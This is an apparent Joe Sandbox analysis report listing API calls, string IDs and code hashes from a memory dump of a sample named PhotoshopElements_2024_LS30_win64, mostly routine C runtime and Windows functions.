                                                                                                        • Instruction Fuzzy Hash: F9519AB090460ACBCF05AFA8E84C1BDBFB5FF46310F514545E491AB664CBB98A28DF52
                                                                                                        APIs
                                                                                                          • Part of subcall function 00536413: GetLastError.KERNEL32(00000002,00000000,00000006,0051DC92,00000000,00000000,00000002,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 00536418
                                                                                                          • Part of subcall function 00536413: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0053C9D9,00000000,00000000,?,00000000,00000002), ref: 005364B6
                                                                                                        • _free.LIBCMT ref: 005357F4
                                                                                                        • _free.LIBCMT ref: 0053580D
                                                                                                        • _free.LIBCMT ref: 0053584B
                                                                                                        • _free.LIBCMT ref: 00535854
                                                                                                        • _free.LIBCMT ref: 00535860
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast
                                                                                                        • String ID: C
                                                                                                        • API String ID: 3291180501-1037565863
                                                                                                        • Opcode ID: b59b9a4c04e5bddeb2a655a29832c63211a5ede544af84bb5ed44b2de8ef5838
                                                                                                        • Instruction ID: 78516f2641b0f0ab2831e2c35c5e53640c050288777b3eae524de65b4e3abaad
                                                                                                        • Opcode Fuzzy Hash: b59b9a4c04e5bddeb2a655a29832c63211a5ede544af84bb5ed44b2de8ef5838
                                                                                                        • Instruction Fuzzy Hash: AAB14F75901A1ADFDB25DF14C888AADBBB5FF48354F5045A9E84AA7350E730AE90CF40
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00512F57
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00512F5F
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00512FE8
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00513013
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00513068
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: 9bc99f4980d279d5050396c8b9db91c71ff9aec0a8fe3ca686775cb482b1e183
                                                                                                        • Instruction ID: 7388ef95e1bdc7f6dc36be5e2a336ed363bb212f1b35ef4965df21ad74fd4c01
                                                                                                        • Opcode Fuzzy Hash: 9bc99f4980d279d5050396c8b9db91c71ff9aec0a8fe3ca686775cb482b1e183
                                                                                                        • Instruction Fuzzy Hash: 1541C234A00219AFDF10DF68C885ADEBFB5BF85314F148555F8159B392C732AAA6CB90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 0-537541572
                                                                                                        • Opcode ID: 39e9867b7e470e27375217cd79fc6c99c46724e366d44e9032736dd285a75110
                                                                                                        • Instruction ID: 9384a7973dc448095e855d8d7774587cb9f557a9932a240949a124911e7bab5e
                                                                                                        • Opcode Fuzzy Hash: 39e9867b7e470e27375217cd79fc6c99c46724e366d44e9032736dd285a75110
                                                                                                        • Instruction Fuzzy Hash: F321E7B2E0921DABCB3297349C85A1E7F68FF5E770F252911ED16A7290E630DD00D5E0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00540125: _free.LIBCMT ref: 0054014A
                                                                                                        • _free.LIBCMT ref: 00540427
                                                                                                          • Part of subcall function 00535D79: RtlFreeHeap.NTDLL(00000000,00000000,?,0054014F,?,00000000,?,?,?,005403F2,?,00000007,?,?,00540897,?), ref: 00535D8F
                                                                                                          • Part of subcall function 00535D79: GetLastError.KERNEL32(?,?,0054014F,?,00000000,?,?,?,005403F2,?,00000007,?,?,00540897,?,?), ref: 00535DA1
                                                                                                        • _free.LIBCMT ref: 00540432
                                                                                                        • _free.LIBCMT ref: 0054043D
                                                                                                        • _free.LIBCMT ref: 00540491
                                                                                                        • _free.LIBCMT ref: 0054049C
                                                                                                        • _free.LIBCMT ref: 005404A7
                                                                                                        • _free.LIBCMT ref: 005404B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 20a2df4b6017b9e4a6bfe9a461f7a4993f2dabf9da2ba4bb45b6a73952bab12d
                                                                                                        • Instruction ID: 55f9f92144ebf0c8905cda6607de98155d27f39e3f4dc1fc9e0caa4d35ec71f7
                                                                                                        • Opcode Fuzzy Hash: 20a2df4b6017b9e4a6bfe9a461f7a4993f2dabf9da2ba4bb45b6a73952bab12d
                                                                                                        • Instruction Fuzzy Hash: A7110076540F09B6D624BBB0CC4FFCB7FACBF84714F506C19B39BA6092E675A5048690
                                                                                                        APIs
                                                                                                        • GetConsoleOutputCP.KERNEL32(00000000,?,?), ref: 0053A8D7
                                                                                                        • __fassign.LIBCMT ref: 0053AABC
                                                                                                        • __fassign.LIBCMT ref: 0053AAD9
                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0053AB21
                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0053AB61
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0053AC09
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                        • String ID:
                                                                                                        • API String ID: 1735259414-0
                                                                                                        • Opcode ID: 964471be2a7264f5819afdc63e699fc24df574edfcbf6ff6c81d1ea7a818e49c
                                                                                                        • Instruction ID: 598bb7f73885e8fddf70ad31b75994cea354d96fd6d3f7618881849de6865b50
                                                                                                        • Opcode Fuzzy Hash: 964471be2a7264f5819afdc63e699fc24df574edfcbf6ff6c81d1ea7a818e49c
                                                                                                        • Instruction Fuzzy Hash: 46C1BB75D002999FCB14CFA8C8909EDBFB5BF49314F28816AE895FB242D6319D42CF60
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0027D34C
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0027D36E
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0027D38E
                                                                                                        • __Getctype.LIBCPMT ref: 0027D437
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0027D484
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0027D49C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                        • String ID:
                                                                                                        • API String ID: 1102183713-0
                                                                                                        • Opcode ID: 52d25650e61769bfc6b3b2543d4ae95d58576ce765a51b1c149c2edd073bb319
                                                                                                        • Instruction ID: 93f74fda10ce53640a73d22acfbb0b72473a8f90e7618342498c178d604293d8
                                                                                                        • Opcode Fuzzy Hash: 52d25650e61769bfc6b3b2543d4ae95d58576ce765a51b1c149c2edd073bb319
                                                                                                        • Instruction Fuzzy Hash: F551A1B1D107168FDB20DF54D841BAEBBB4FF48310F149669E849AB292E730B985CB91
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00210AB9
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00210ADB
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00210AFB
                                                                                                        • __Getctype.LIBCPMT ref: 00210BA1
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00210BC0
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00210BD8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                        • String ID:
                                                                                                        • API String ID: 1102183713-0
                                                                                                        • Opcode ID: ce01bd0f86f069a4099347263f28979d3b864c2833dabb26c97de9fa6560d120
                                                                                                        • Instruction ID: 6b8adcfd3fe4e8031b67baa62052dea6b50b719a47a894a4c9fbceac7267c014
                                                                                                        • Opcode Fuzzy Hash: ce01bd0f86f069a4099347263f28979d3b864c2833dabb26c97de9fa6560d120
                                                                                                        • Instruction Fuzzy Hash: 7851AFB1D1420ACBDB10DF54D881BAEBBF4FB58718F144269D805A7281DB70BE91CB91
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(?,?,00222CC0,003ECFBB,?,Terminate channel), ref: 003EEAE7
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00222CC0,003ECFBB,?,Terminate channel), ref: 003EEB67
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID: Closing inPipe %p$Closing outPipe %p$CommBridge$OOBEUtils
                                                                                                        • API String ID: 2962429428-1143323105
                                                                                                        • Opcode ID: fe225fb550eaef699e5f86750ba465ad805333bcb8bac640325651cd6a1283b5
                                                                                                        • Instruction ID: e3359ca4d35adda497539fbb3882b959626e693782c86280b47d76f7c2c1420b
                                                                                                        • Opcode Fuzzy Hash: fe225fb550eaef699e5f86750ba465ad805333bcb8bac640325651cd6a1283b5
                                                                                                        • Instruction Fuzzy Hash: 2821D170B807616FDB16AB299C16F1B7A56BF01B10F06431DF802B76E1C7A0AD01DBD2
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00401F8E,000000FF,000000FF), ref: 003F0E67
                                                                                                        • ResetEvent.KERNEL32(?,?,00401F8E,000000FF,000000FF), ref: 003F0E7E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EventObjectResetSingleWait
                                                                                                        • String ID: NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils
                                                                                                        • API String ID: 3162950495-832234452
                                                                                                        • Opcode ID: 984e0f49439405d37d78a375bc338bf08fdb7a8d896c963fdd28fc866834a8dc
                                                                                                        • Instruction ID: 428eace95ca1f262485765cdccfcc3d00d8878ddd83e0b66c263ac5752d7c7ff
                                                                                                        • Opcode Fuzzy Hash: 984e0f49439405d37d78a375bc338bf08fdb7a8d896c963fdd28fc866834a8dc
                                                                                                        • Instruction Fuzzy Hash: 1F112332B806186FEB206B5CEC47AAA7789EB11B20F454769F858E72D1C6A29D0086C0
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,005311FC,?,?,005311C4,?,00000000,?), ref: 0053125F
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00531272
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,005311FC,?,?,005311C4,?,00000000,?), ref: 00531295
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: 19b26d40ffd5373eda344785a874a1fed92976a0c6e54bb4f155e03cf16a6768
                                                                                                        • Instruction ID: b10c38b423c489133a275c4a5086d280b25a710946e7df8a73bd5c82a1f0c39a
                                                                                                        • Opcode Fuzzy Hash: 19b26d40ffd5373eda344785a874a1fed92976a0c6e54bb4f155e03cf16a6768
                                                                                                        • Instruction Fuzzy Hash: 24F08C34901618FFCB129BA9EC0EB9E7FB9FB01752F000160F401E21A0CB708F04EA94
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3033488037-0
                                                                                                        • Opcode ID: 1ca0013a0d401a3f1c78fd955fc5e4322fcbdb6e4bd60b9a7b9c92a489124898
                                                                                                        • Instruction ID: e5eae5c4fbf36a5a43b539830f3049c62372bbf48258d4c2ed58bb5f8676cc15
                                                                                                        • Opcode Fuzzy Hash: 1ca0013a0d401a3f1c78fd955fc5e4322fcbdb6e4bd60b9a7b9c92a489124898
                                                                                                        • Instruction Fuzzy Hash: 5051AE72A00B05AFDB219F69DC41B6ABBF5FF98720F141569E846D7290F731EA41CB80
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002B7526
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002B7548
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002B7568
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 002B760D
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002B7625
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                        • String ID:
                                                                                                        • API String ID: 459529453-0
                                                                                                        • Opcode ID: a5f6768e2a5ebf67ab3d07efa92fbbc17e7d275c5ba6421990ccdf1775fdc3d9
                                                                                                        • Instruction ID: c9e0b4f772323b667091776bff46ca1c76dfad8db261ec47ec0e6bb8c8ec4749
                                                                                                        • Opcode Fuzzy Hash: a5f6768e2a5ebf67ab3d07efa92fbbc17e7d275c5ba6421990ccdf1775fdc3d9
                                                                                                        • Instruction Fuzzy Hash: CA41B071A15216CFCB20CF98D995BAEBBB4FF84750F14455AE806AB381DB30ED05CB90
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0027D006
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0027D028
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0027D048
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0027D0ED
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0027D105
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
